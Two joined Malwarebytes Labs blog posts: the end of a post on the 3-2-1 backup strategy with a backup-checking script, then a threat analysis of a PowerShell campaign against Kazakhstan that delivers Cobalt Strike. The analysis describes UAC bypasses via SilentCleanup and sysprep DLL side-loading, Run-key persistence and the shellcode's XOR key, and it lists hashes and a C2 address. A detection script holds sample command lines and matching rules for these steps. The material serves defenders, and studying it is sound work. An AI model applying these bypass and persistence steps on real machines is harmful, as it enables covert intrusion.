If the files are work related, you should be using the business-approved storage or backup solution. Placing files in a randomly selected service of your choice can have disastrous consequences if sensitive files are hacked or leaked.

Do people back up their backups?

They do! It’s not unheard of to have a PC fail with important files on it, and discover there’s a problem with the backup too. This is why you have backups of backups. It’s also important to have sensible backups.

If an organisation simply copies hundreds of thousands of files into a big folder and thinks “job done”, that’s going to be a problem. If it suffers a ransomware attack six months later, it probably won’t end well: the files will be six months out of date, and the organisation will lose six months of work or find itself paying an exorbitant ransom. System files for business operations may have been replaced by new technology, so the old files are no longer relevant.

If the files are still relevant but not organised in a way that makes it clear what to do with them, that’s also bad, and you’re back to square one. Did you back everything up in a logical, regular fashion but then leave the storage device next to the main systems, which are now all under flood water? That’s not going to help very much, either.

The 3-2-1 backup strategy

The best starting point for most businesses is the 3-2-1 backup strategy, in which you keep:

  1. Three copies of your data, in total.
  2. Two copies of your data on-site, but on different devices.
  3. One remote copy, in case your premises become damaged.

The local copies give you easy, immediate and redundant access to your data when you need it. The remote copy, which will be harder to access, is your insurance policy against fire, flood, and other disasters. To act as a fallback if you are attacked with ransomware, the off-site copy should be inaccessible to an attacker who has administrator rights on your network.
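The 3-2-1 rule, the “is the backup actually usable?” worries from the previous section and the off-site isolation requirement can all be expressed as checks that run against an inventory of copies. The script below is an added example written for this page, not code from Malwarebytes or any backup product; the copies, device names, timestamps and the one-day freshness limit are constructed sample data.

```python
"""Check a set of backup copies against the 3-2-1 rule, freshness and integrity.

Added example, not code from the Malwarebytes post. Every copy, device name
and timestamp below is constructed sample data.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
import hashlib


@dataclass
class BackupCopy:
    label: str            # human-readable name of the copy
    device: str           # physical device or medium holding the copy
    offsite: bool         # stored away from the premises?
    lan_reachable: bool   # writable from the on-premises network with admin rights?
    taken_at: datetime    # when the copy was made
    data: bytes           # the copy's content (inline here; a file or image in practice)


def sha256(data: bytes) -> str:
    """Hex digest used to detect a corrupt or tampered copy."""
    return hashlib.sha256(data).hexdigest()


def check_3_2_1(copies, expected_digest, now, max_age=timedelta(days=1)):
    """Return a list of findings; an empty list means the backup set passes.

    copies includes the live copy, so "three copies in total" counts it.
    expected_digest is the hash recorded when the backup job last ran.
    """
    findings = []
    if len(copies) < 3:
        findings.append(f"only {len(copies)} copies, need 3")
    onsite = [c for c in copies if not c.offsite]
    if len({c.device for c in onsite}) < 2:
        findings.append("fewer than 2 on-site copies on distinct devices")
    offsite = [c for c in copies if c.offsite]
    if not offsite:
        findings.append("no off-site copy")
    for c in offsite:
        if c.lan_reachable:
            findings.append(f"{c.label}: off-site copy is reachable from the LAN, "
                            "so ransomware with admin rights could reach it too")
    for c in copies:
        if sha256(c.data) != expected_digest:
            findings.append(f"{c.label}: checksum mismatch (corrupt or tampered)")
        if now - c.taken_at > max_age:
            findings.append(f"{c.label}: stale, last taken {now - c.taken_at} ago")
    return findings


# Constructed sample data (not real files).
NOW = datetime(2021, 11, 15, tzinfo=timezone.utc)
ORIGINAL = b"constructed sample: payroll export 2021-11\n"
ORIGINAL_DIGEST = sha256(ORIGINAL)


def flawed_set():
    """Looks like 3-2-1 on paper, but the off-site copy is stale, corrupt and LAN-writable."""
    return [
        BackupCopy("primary", "workstation-ssd", False, True, NOW - timedelta(hours=2), ORIGINAL),
        BackupCopy("office NAS", "office-nas", False, True, NOW - timedelta(hours=2), ORIGINAL),
        BackupCopy("cloud copy", "cloud-bucket", True, True, NOW - timedelta(days=8),
                   ORIGINAL[:-1] + b"?"),
    ]


def compliant_set():
    """Same layout, but the off-site copy is fresh, intact and not writable from the LAN."""
    return [
        BackupCopy("primary", "workstation-ssd", False, True, NOW - timedelta(hours=2), ORIGINAL),
        BackupCopy("office NAS", "office-nas", False, True, NOW - timedelta(hours=2), ORIGINAL),
        BackupCopy("cloud copy", "cloud-bucket", True, False, NOW - timedelta(hours=3), ORIGINAL),
    ]


if __name__ == "__main__":
    for name, copies in (("flawed", flawed_set()), ("compliant", compliant_set())):
        print(name, check_3_2_1(copies, ORIGINAL_DIGEST, NOW) or ["OK"])
```

Running it prints three findings for the flawed set (LAN-reachable off-site copy, checksum mismatch, stale copy) and “OK” for the compliant one. The point of the checksum and age checks is that “we have three copies” says nothing about whether any of them would restore; a scheduled run of this kind of check is what turns a backup plan into a tested one.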

Additional backup resources

You may wish to make a note in your diary now for World Backup Day which comes around every March. It’s a great reminder to set those backup plans in motion, and also do some more general file spring-cleaning while you’re at it. Whatever your strategy, the most important thing is to start backing up now. Not next week, most definitely not next month and almost certainly not “when I get around to it”.

There are a lot of people out there who will sadly only realise the value of backups when it’s too late to do anything about it.

Getting backups right

Backups are simple in theory, but they often let you down when you need them most. On a recent Malwarebytes Lock and Code podcast, host David Ruiz spoke to Matt Crape, a technical account manager for VMware and backups expert, about why backups are so hard to get right, and what the most basic missteps are when companies roll out a backup plan.


The post The importance of backing up appeared first on Malwarebytes Labs.

A multi-stage PowerShell based attack targets Kazakhstan

This blog post was authored by Hossein Jazi.

On November 10 we identified a multi-stage PowerShell attack using a document lure impersonating the Kazakh Ministry of Health Care, leading us to believe it targets Kazakhstan.

A threat actor under the user name of DangerSklif (perhaps in reference to Moscow’s emergency hospital) created a GitHub account and uploaded the first part of the attack on November 8.

In this blog we will review the different steps the attacker took to fly under the radar with the intent of deploying Cobalt Strike onto its victims.

Overview

The attack started by distributing a RAR archive named “Уведомление.rar” (“Notice.rar”). The archive contains an lnk file with the same name, pretending to be a PDF document from the “Ministry of Health Care, Republic of Kazakhstan”. Upon opening the lnk file, a PDF file is shown to distract the victim while, in the background, the multiple stages of this attack are executed. The decoy document is an amendment to a Covid-19 policy issued by the Chief State Sanitary of the Republic of Kazakhstan.

Figure 1: Decoy document

Attack process

The following figure shows the overall process of this attack. The attack starts by executing the lnk file, which calls PowerShell to perform several techniques such as privilege escalation and persistence through an autorun registry key. We provide the detailed analysis in the next section.

Figure 2: Attack process

All stages of this attack have been hosted in one GitHub repository named GoogleUpdate. This repository was created on November 8th by a user named DangerSklif; the DangerSklif user account was created on GitHub on November 1st.

Figure 3: GitHub repository

Analysis

The embedded lnk file is obfuscated; after de-obfuscation we can see that it uses cmd.exe to call PowerShell, which downloads and executes the first stage of the attack (lib7.ps1) from the GitHub account.

Figure 4: lnk file

lib7.ps1 downloads the decoy PDF file from the same GitHub account and stores it in the Downloads directory. In the next step it opens the decoy PDF to distract the user while it performs the rest of the process in the background, which includes getting the OS version and downloading the next stage based on that version.

Figure 5: lib7.ps1

If the OS version is 7 or 8, it downloads and executes lib30.ps1; if the OS version is 10, it downloads and executes lib207.ps1. The actor checks the OS version in order to run the privilege escalation method that matches it. These techniques were previously used by TA505 in their campaign to drop ServHelper.

  • Using the SilentCleanup task in the Task Scheduler to bypass UAC in Windows 10: the attacker used lib207.ps1 to bypass UAC in Windows 10. The PowerShell commands used to perform the bypass are XOR-encrypted with the key 0x58.
Figure 6: Lib207

After decrypting the commands, we can see the UAC bypass process, which includes creating a SilentCleanup task in the Task Scheduler that calls PowerShell to execute the created vbs file with elevated privileges.

Figure 7: Lib207 after decryption
  • Using the sysprep.exe system utility and DLL side-loading to bypass UAC in Windows 7 and 8: lib30.ps1 is used to execute this bypass. Similar to lib207.ps1, this PowerShell script is also XOR-encrypted, but with a different key (0x02).
Figure 8: Lib30

Figure 9 shows the PowerShell commands after decryption. The process starts by creating a batch file (cmd.bat) in the Windows\Temp directory. In the next step, a cab archive is created containing a DLL (CRYPTBASE.dll for Windows 7 or shcore.dll for Windows 8). This cab file is then extracted into the C:\Windows\System32\Sysprep directory using wusa.exe.

Finally, the sysprep.exe system utility is launched, which side-loads CRYPTBASE.dll on Windows 7 or shcore.dll on Windows 8. This DLL executes the created cmd.bat file, which therefore runs with high privileges.

Figure 9: Lib30 after decryption

After bypassing UAC, on all OS versions the next-stage payload (lib106.ps1) is downloaded and executed.

This stage performs the following actions:

  • Creates a vbs file (cu.vbs) in the Program Files directory and makes this multi-stage attack persistent by adding the vbs file to the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key.
  • Hides the vbs file using the “attrib.exe +h” command.
  • Downloads and executes the final stage (updater.ps1) using PowerShell.
Figure 10: lib106.ps1
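Each of the stages described so far leaves a distinct trace in endpoint telemetry: the cab extraction into the Sysprep directory, sysprep.exe loading a DLL from its own directory instead of System32, a Run key value pointing at a script, attrib.exe hiding that script, and a SilentCleanup task whose action launches PowerShell. The detection logic below is an added example written for this page, not Malwarebytes code or a published rule set. The events are constructed Sysmon-style records (registry value set, process creation, image load, task registration); the cab name pkg.cab, the Run value name “updater”, the temp script name and the “Windows 7/8” benign events are assumptions made for the sample.

```python
"""Flag the persistence and UAC-bypass artefacts from this post in endpoint telemetry.

Added example, not code from the Malwarebytes post. EVENTS are constructed
Sysmon-style records; pkg.cab, the 'updater' value name and u.vbs are assumptions.
"""

RUN_KEY_SUFFIX = r"\software\microsoft\windows\currentversion\run"
SCRIPT_EXT = (".vbs", ".js", ".ps1", ".bat", ".cmd")
SYSPREP_DIR = r"c:\windows\system32\sysprep"
SIDELOAD_DLLS = {"cryptbase.dll", "shcore.dll"}   # the two DLLs named in the analysis

# Constructed events in the order the stages would produce them, plus two benign ones.
EVENTS = [
    {"type": "task_register", "task": r"\SilentCleanup",
     "action": r'powershell.exe -Command "wscript.exe C:\Windows\Temp\u.vbs"'},
    {"type": "process_create", "image": r"C:\Windows\System32\wusa.exe",
     "cmdline": r"wusa.exe C:\Windows\Temp\pkg.cab /extract:C:\Windows\System32\Sysprep"},
    {"type": "image_load", "image": r"C:\Windows\System32\Sysprep\sysprep.exe",
     "loaded": r"C:\Windows\System32\Sysprep\CRYPTBASE.dll"},
    {"type": "registry_set", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "updater", "data": r'wscript.exe "C:\Program Files\cu.vbs"'},
    {"type": "process_create", "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r'attrib.exe +h "C:\Program Files\cu.vbs"'},
    # Benign: the normal Schedule service host, and CRYPTBASE loaded from System32.
    {"type": "process_create", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"type": "image_load", "image": r"C:\Windows\System32\Sysprep\sysprep.exe",
     "loaded": r"C:\Windows\System32\CRYPTBASE.dll"},
]


def split_path(p: str):
    """Lower-cased (directory, file name) of a Windows path."""
    d, _, f = p.lower().rpartition("\\")
    return d, f


def detect(events):
    """Return (rule, detail) tuples for events matching the stages in this post."""
    alerts = []
    for e in events:
        t = e["type"]
        if t == "task_register":
            if e["task"].lower().endswith("silentcleanup") and "powershell" in e["action"].lower():
                alerts.append(("silentcleanup_task", e["action"]))
        elif t == "process_create":
            _, exe = split_path(e["image"])
            cmd = e["cmdline"].lower()
            if exe == "wusa.exe" and "sysprep" in cmd:
                alerts.append(("wusa_to_sysprep", e["cmdline"]))
            elif exe == "attrib.exe" and "+h" in cmd and any(x in cmd for x in SCRIPT_EXT):
                alerts.append(("attrib_hide_script", e["cmdline"]))
        elif t == "image_load":
            _, exe = split_path(e["image"])
            dll_dir, dll = split_path(e["loaded"])
            # Side-load: sysprep.exe picks up a DLL from its own directory, not System32.
            if exe == "sysprep.exe" and dll in SIDELOAD_DLLS and dll_dir == SYSPREP_DIR:
                alerts.append(("sysprep_sideload", e["loaded"]))
        elif t == "registry_set":
            data = e["data"].lower()
            if e["key"].lower().endswith(RUN_KEY_SUFFIX) and any(x in data for x in SCRIPT_EXT):
                alerts.append(("run_key_script", f'{e["value"]} = {e["data"]}'))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"[{rule}] {detail}")
```

The two benign events produce nothing: the Schedule service host is not matched by any rule, and CRYPTBASE.dll loaded from System32 is the normal case. Chaining several of these rules in a short time window (wusa.exe writing into Sysprep followed by the side-load, or a Run key write followed by attrib +h on the same path) is what turns individually noisy signals into a confident alert.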

The final stage (updater.ps1) executes Cobalt Strike in a PowerShell context; in fact, this PowerShell script is a PowerShell variant of Cobalt Strike.

Figure 11: updater.ps1

The Cobalt Strike shellcode is base64-encoded and XOR-encrypted with the key 35. After decoding and decrypting the shellcode, the script allocates memory for it using VirtualAlloc and finally executes it by calling the Invoke function.

Figure 12: Updater.ps1 after de-obfuscation

Kazakhstan in the news

Kazakhstan has been in the news recently for overtaking China in the cryptomining industry, depleting its own electricity resources. The energy-rich country is a very important ally for Russia in particular, with lucrative joint oil and gas ventures.

Other than their GitHub profile, we do not have much information on the threat actor or their exact intentions with this attack. However, monitoring and espionage are a likely motive.

Malwarebytes users were protected thanks to the Anti-Exploit layer of our product.


IOCs

Уведомление.pdf.lnk:
574a33ee07e434042bdd1f59fc89120cb7147a1e20b1b3d39465cd6949ba7d99
Уведомление.rar:
d0f3c838bb6805c8a360e7b1f28724e73e7504f52147bbbb06551f91f0df3edb
Updater.ps1:
08f096134ac92655220d9ad7137e35d3b3c559359c238e034ec7b4f33a246d61
lib106.ps1:
81631df5d27761384a99c1f85760ea7fe47acc49ef81003707bb8c4cbf6af4be 
lib2.ps1:
912434caec48694b4c53a7f83db5f0b44b84ea79be57d460d83f21181ef1acbb
lib207.ps1:
893f6cac7bc1a1c3ee72d5f3e6994e902b5af044f401082146a486a0057697e5 
lib30.ps1:
11d6b0b76d057ac9db775d9a1bb14da2ed9acef325060d0452627d9391be4ea2 
lib63.ps1:
8f974d8d0741fd1ec9496857d7aabbe0d3ba4d2e52cc311c76c28396edae9eb9 
lib64.ps1:
301194613cbc11430d67acf7702fd15ec40ee0f9be348cf8a33915809b65bc5e
lib7.ps1:
026fcb13e9a4ea6c1eab73c892118a96731b868a1269f348a14a5087713dd9e5
lib706.ps1:
36aba78e63825ab47c1421f71ca02422c86c774ba525959f42b8e565a808a7d4 
C2:
188.165.148.241

The post A multi-stage PowerShell based attack targets Kazakhstan appeared first on Malwarebytes Labs.